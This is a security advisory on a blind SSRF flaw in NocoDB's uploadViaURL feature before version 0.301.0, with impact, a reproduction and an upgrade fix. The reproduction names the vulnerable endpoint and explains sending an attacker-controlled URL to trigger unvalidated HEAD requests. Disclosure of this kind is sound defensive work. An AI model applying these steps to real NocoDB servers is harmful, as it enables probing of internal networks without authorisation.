NocoDB Blind Server-Side Request Forgery Vulnerability in uploadViaURL Functionality

A blind Server-Side Request Forgery (SSRF) vulnerability has been identified in NocoDB versions prior to 0.301.0. The issue arises in the 'uploadViaURL' feature, where an unprotected 'HEAD' request allows limited outbound requests to arbitrary URLs. Although the subsequent file retrieval process applies SSRF protections, the initial metadata request bypasses validation, enabling this vulnerability.

Impact

Exploitation of this vulnerability allows blind SSRF through unfiltered outbound 'HEAD' requests, with potential for limited internal service probing and interaction with sensitive internal endpoints that respond to 'HEAD' requests.

Reproduction

To reproduce this vulnerability, send a POST request to the '/api/v2/storage/upload-by-url' endpoint with a JSON payload that includes a URL controlled by the attacker. The server will process this request and issue an unvalidated 'HEAD' request to the specified URL before applying any SSRF protections, thereby exploiting the vulnerability.

Remediation

Users can upgrade to NocoDB version 0.301.0 or later, where this vulnerability has been patched.